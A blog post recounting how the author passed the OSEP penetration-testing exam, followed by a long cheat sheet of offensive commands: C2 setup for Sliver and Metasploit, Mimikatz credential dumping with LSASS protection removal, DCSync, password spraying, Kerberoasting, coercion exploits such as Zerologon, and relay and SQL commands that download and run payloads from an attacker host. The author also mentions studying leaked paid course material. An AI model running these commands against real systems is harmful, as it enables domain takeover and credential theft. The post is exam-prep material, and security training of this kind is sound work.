Sign in
OSEP

How to pass OSEP for the first time

How I passed OSEP on the first attempt

Nothing

9 min read
How to pass OSEP for the first time

Overview of OSEP

Brief Summary: An advanced version of OSCP with a focus on Active Directory (AD).
Detailed Explanation: OSEP is an advanced penetration testing course designed for security professionals seeking to enhance their skills in bypassing modern defense mechanisms. Those who complete the course and pass the exam earn the Offensive Security Experienced Penetration Tester (OSEP) certification. The curriculum builds upon knowledge from Penetration Testing with Kali Linux (PWK) and trains students to conduct sophisticated penetration tests against mature organizations with well-established security measures.

As is standard with Offensive Security (OffSec) courses, students are provided with documentation and lab environments to engage in self-directed learning—an approach that, despite its effectiveness, some may find expensive given the course price of $1,649.

image.png

Preparation

Before enrolling, my expertise was mainly in web exploitation, meaning my knowledge of Active Directory (AD) and antivirus (AV) evasion was relatively weak. This initially made me hesitate to grasp all the necessary concepts. To compensate, I dedicated two weeks to studying AV evasion techniques through MalDev Academy (leaked materials, admittedly). While the academy provided useful techniques, the focus was primarily on C/C++, which I found cumbersome. Instead, I used GitHub Copilot to convert the code into C#.

image.png

Key Recommendations:

  • Familiarity with C# and PowerShell is essential. The course heavily relies on these languages, and lacking proficiency may result in difficulty keeping up.

Lab Experience

A strong aspect of OffSec courses is their practical lab environments. While OSEP includes only six labs, they are well-structured and directly aligned with the course content. Completing all six labs provides a high degree of confidence for the exam. I maintained a study schedule of approximately four hours per day, and after two months, I had completed most of the course material.

Exam Experience

OSEP offers flexibility in achieving the passing criteria. Candidates can either:

  • Earn at least 100 points. Certain machines provide 20 points if privilege escalation is required. Others provide 10 points if no privilege escalation is needed. Some machines do not award any points
  • Complete the exam objective (typically, retrieving the secret.txt file located deep within the environment).

My Exam Process:

  • Start Time: 5:00 PM
  • Initial Progress: Within two hours, I gained initial access.
  • Stagnation: Over the next four hours, I encountered a roadblock. Despite using various automated reconnaissance tools, I made no significant progress.
  • Switching to Manual Testing: Realizing automation was insufficient, I shifted to manual testing.
image.png
  • Breakthrough: Within 30 minutes, I identified the next attack vector and the final target.
  • Resting Strategy: Since the path forward was clear, I opted to sleep for eight hours before continuing.
  • Completion: Upon resuming, I successfully retrieved secret.txt within five additional hours.
    At this point, I had secured a passing score. However, in my workplace, there is an ongoing joke: "Either full pass or fail—there’s no in-between." Not wanting to settle for the minimum, I decided to complete the entire exam environment, which required an additional 10 hours.

Reporting & Final Steps

With the exam completed, I allocated the remaining four hours to drafting the required penetration testing report. Given the comprehensive nature of my methodology, a fully detailed report would have been excessively long. Since I had already met the passing criteria, I documented only the essential steps and backed up additional materials for reference before submitting.

With that, I wrapped up the exam process and took a well-deserved break.

Tips & Tricks

Choosing a C2 Framework
While OSEP primarily teaches Metasploit, students are free to utilize other open-source Command and Control (C2) frameworks. Based on my research, I chose Sliver as my primary C2 and Metasploit as a backup, allowing for seamless shell migration between the two.

## Setup sliver beacon 
profiles new beacon --mtls 192.168.49.120:8081 --format shellcode --seconds 5 --jitter 3 primary-payload
stage-listener -u tcp://192.168.49.120:8080 -p primary-payload --prepend-size

## Metasploit
msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST tun0;set LPORT 443;set EnableStageEncoding true;set StageEncoder x64/xor;set ExitOnSession false;exploit -jz"

## transfer from metasploit to sliver
use windows/local/payload_inject
set payload windows/x64/custom/reverse_tcp
set session 1
set LHOST tun0
set LPORT 8080
run

## transfer from sliver to metaploit
msf-inject -L 192.168.13.X -l 443 -m meterpreter/reverse_tcp

What I like about Sliver is that it allows me to run .Net assembly easily and quickly, while metasploit is too long (you will feel it clearly when you encounter the article with Applocker when we have to recompile it to be able to use it with Living Off The Land Binaries, Scripts and Libraries (https://lolbasproject.github.io/)

## Metasploit
meterpreter > bg
use /post/windows/manage/execute_dotnet_assembly/
set SESSION 1
set DOTNET_EXE /opt/SharpCollection/Seatbelt.exe
set ARGUMENTS '-group=system'
run

## Sliver
seatbelt -- -group=system

sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"kerberos::list /export\" \"exit\"
💡
What others do well, let others do.

Of course Sliver also has its weaknesses and I used Metasploit to overcome that:

  • Sliver's stage file is too big => Use Metasploit as initial access
  • Sliver's access token handling ability is unstable => Use metasploit to steal or migrate to a process with another token
  • Both of these tunnels are bad => Chisel

Understand the capabilities of the tools you use

I encourage you to understand some of the following tools that will make your life easier:

  • Mimikatz 
#export ticket
kerberos::list /export exit

#Load mimidrv
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
or
privilege::debug 
!+ 
#disable lsa
!processprotect /process:lsass.exe /remove
exit

#dump credential
privilege::debug
sekurlsa::logonpasswords
exit

sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7

sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"!+\" \"!processprotect /process:lsass.exe /remove\" \"exit\"
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"lsadump::dcsync /domain:infinity.com /user:corp\krbtgt\" \"exit\" 
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\" 
sideload /home/kali/Desktop/shell/mimikatz/x64/mimikatz.exe '' \"privilege::debug\"  \"token::elevate\" \"lsadump::secrets\" \"exit\"
  • CrackMapExec
crackmapexec [protocol] 10.10.10.1
crackmapexec <protocol> --help
crackmapexec ldap -L //list Module

#SMB
crackmapexec smb 192.168.133.0/24

#Null session unum user
crackmapexec smb 10.129.203.121  -u '' -p '' --users  --export $(pwd)/users.txt 
sed -i "s/'/\"/g" users.txt;jq -r '.[]' users.txt > userslist.txt // extract user

#Using Krb5cc
crackmapexec smb 172.16.246.160-170 -k --use-cache

#Enum share
crackmapexec smb 10.129.203.121 -u guest -p '' --shares //Null Session
crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! --shares
crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! --spider IT --pattern txt //Find txt in share
crackmapexec smb 10.129.204.177 -u grace -p Inlanefreight01! --spider IT --regex . //List ALl
crackmapexec smb 10.129.204.177 -u grace -p Inlanefreight01! --spider IT --content --regex Encrypt //Search with content 
crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! --share IT --get-file Creds.txt Creds.txt // download file
crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! --share IT --put-file /etc/passwd passwd // upload
crackmapexec smb 10.129.203.121 -u grace -p 'Inlanefreight01!' -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL
cat /tmp/cme_spider_plus/10.129.203.121.json

#Spray passworod
crackmapexec smb 10.129.203.121 -u users.txt -p Inlanefreight01! --continue-on-succes 
crackmapexec smb 10.129.203.121 -u noemi grace david carlos -p Inlanefreight01! Inlanefreight02!
crackmapexec smb 10.129.203.121 -u users.txt -p passwords.txt --continue-on-succes
crackmapexec smb 10.129.203.121 -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success // 1-1 on wordlist
crackmapexec smb 192.168.133.157 -u Administrator -p Password@123 --local-auth //Ussing LocalAccount 

smbpasswd -r 10.129.203.121 -U peter //Status PASSWORD_MUST_CHANGE

crackmapexec smb 10.129.203.121 -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success
crackmapexec winrm 10.129.203.121 -u userfound.txt -p passfound.txt --no-bruteforce --continue-on-success //check winrm

crackmapexec ldap dc01.inlanefreight.htb -u julio grace -p Inlanefreight01! //LDAP

crackmapexec mssql 10.129.203.121 -u julio grace jorge -p Inlanefreight01! //AD Account
crackmapexec mssql 10.129.203.121 -u julio grace -p Inlanefreight01! -d . //Local Account
crackmapexec mssql 10.129.203.121 -u julio grace  -p Inlanefreight01! --local-auth //SQL Account

#ASREPRoastable
crackmapexec ldap dc01.inlanefreight.htb -u users.txt -p '' --asreproast asreproast.out // brute force
crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01! --asreproast asreproast.out // search
hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt // crackpassword 

crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! -M gpp_autologin // grep auto login
crackmapexec smb 10.129.203.121 -u grace -p Inlanefreight01! -M gpp_password
crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01! -M user-desc

#SQL
crackmapexec mssql 10.129.203.121 -u grace -p Inlanefreight01! -q "SELECT name FROM master.dbo.sysdatabases"
crackmapexec mssql 10.129.203.121 -u nicole -p Inlanefreight02! --local-auth -x whoami
crackmapexec mssql 10.129.203.121 -u nicole -p Inlanefreight02! --local-auth --put-file /etc/passwd C:/Users/Public/passwd //upload
crackmapexec mssql 10.129.203.121 -u nicole -p Inlanefreight02! --local-auth --get-file C:/Windows/System32/drivers/etc/hosts hosts //download

crackmapexec mssql 10.129.203.121 -u robert -p Inlanefreight01! -M mssql_priv //check priv
crackmapexec mssql 10.129.203.121 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc

#Kerberoasting
crackmapexec ldap dc01.inlanefreight.htb -u grace -p 'Inlanefreight01!' --kerberoasting kerberoasting.out
hashcat -m 13100 kerberoasting.out /usr/share/wordlists/rockyou.txt

crackmapexec ldap dc01.inlanefreight.htb -u robert -p Inlanefreight01! --trusted-for-delegation
crackmapexec smb 10.129.204.133 -u robert -p 'Inlanefreight01!' --exec-method smbexec -x whoami
crackmapexec smb 10.129.204.133 -u robert -p 'Inlanefreight01!' -M web_delivery -o URL=http://10.10.14.33:8443/2S1jAHS

proxychains4 -q crackmapexec smb 172.16.10.3 -M Zerologon
proxychains4 -q crackmapexec smb 172.16.10.3 -M PetitPotam
proxychains4 -q crackmapexec smb 172.16.10.3 -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M nopac
proxychains4 -q crackmapexec smb 172.16.10.3 -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M dfscoerce
proxychains4 -q crackmapexec smb 172.16.10.3 -u carole.holmes -p 'Y3t4n0th3rP4ssw0rd' -M shadowcoerce
  • Rubeus 
rubeus.exe asktgt /user:harshitrajpal /password:Password@1
rubeus.exe asktgt /user:harshitrajpal /rc4:64FBAE31CC352FC26AF97CBDEF151E03
#ask TGS
rubeus.exe asktgs /user:harshitrajpal /ticket:doIFNDCCBTCgAwIBB...bA== /service:LDAP/dc1.ignite.local
#brute force
rubeus.exe brute /password:Password@1 /noticket

#Pass the Ticket
rubeus.exe ptt /ticket:doIFNDCCBTCgAwI...bA==

rubeus.exe monitor /targetuser:noob$ /interval:10

#kerberroasting
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local
rubeus.exe asreproast /spn:ldap/dc1.ignite.local/ignite.local /format:hashcat

rubeus.exe changepw /ticket:doIFNDCC...bA== /new:Password@1!!!
rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!!
  • SQLRecon
#SQLRecon
sqlrecon '' -a Windows -s sql05 -m whoami
sqlrecon '' -a Windows -s sql05 -m smb -o \\\\192.168.45.204\\nothing

sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lwhoami -l sql27
sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lenablexp -l sql27
sqlrecon '' -a Local -s localhost -u webapp11 -p 89543dfGDFGH4d -m lxpcmd -l sql27 -o \"powershell iex(irm -uri http://192.168.45.237/payload.txt)\"
  • PowerUpSQL
sharpsh '' -u http://192.168.45.237/recon/PowerUpSQL.ps1 -c \"Get-SQLInstanceLocal | Get-SQLServerInfo\"
sharpsh -t 300 '' -u http://192.168.45.237/recon/PowerUpSQL.ps1 -c \"Get-SQLServerLink\"
sharpsh -t 300 '' -u http://192.168.45.237/recon/PowerUpSQL.ps1 -c \"Get-SqlServerLinkCrawl -username webapp11 -password 89543dfGDFGH4d\"

Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLServerInfo -Instance TARGETSERVER
Invoke-SQLAudit -Verbose -Instance TARGETSERVER
Get-SQLQuery -Query "SELECT system_user" -Instance TARGETSERVER
Get-SqlServerLinkCrawl -Instance TARGETSERVER | select instance,links | ft
Get-SqlServerLinkCrawl -Instance TARGETSERVER -Query "select * from master..syslogins" | ft
  • Impacket 
proxychains impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.162.151 -c 'powershell iex(irm -uri http://192.168.45.204/payload.txt)'
proxychains impacket-secretsdump -k -no-pass  dmzdc01.COMPLYEDGE.COM

proxychains impacket-getTGT -dc-ip 172.16.175.168 -hashes aad3b435b51404eeaad3b435b51404ee:e48c13cefd8f9456d79cd49651c134e8 complyedge.com/jim
  • BloodHound 
sudo neo4j console
./BloodHound --no-sandbox 

execute-assembly -t 300 /home/kali/Desktop/shell/csharp/SharpHound.exe  --CollectionMethods All,GPOLocalGroup,LoggedOn --ZipFileName output.zip -SearchForest  --Domain 
execute-assembly -t 300 /home/kali/Desktop/shell/csharp/SharpHound.exe  --CollectionMethods All,GPOLocalGroup,LoggedOn --ZipFileName output.zip --ldapusername adminWebSvc
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName output.zip 
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName output.zip -s --Domain 
sharp-hound-4 '' -c All,GPOLocalGroup,LoggedOn --ZipFileName output.zip -s --Domain

Final Thought

  • Be lazy and find the least laborious way but also be prepared to do everything manually =))
  • As usual, I think Offsec provides advanced foundational knowledge and you will have to dig deep yourself
  • Never trust MS documents, they are deceptive =))
  • Sigh, finally have to learn PWN 😬😬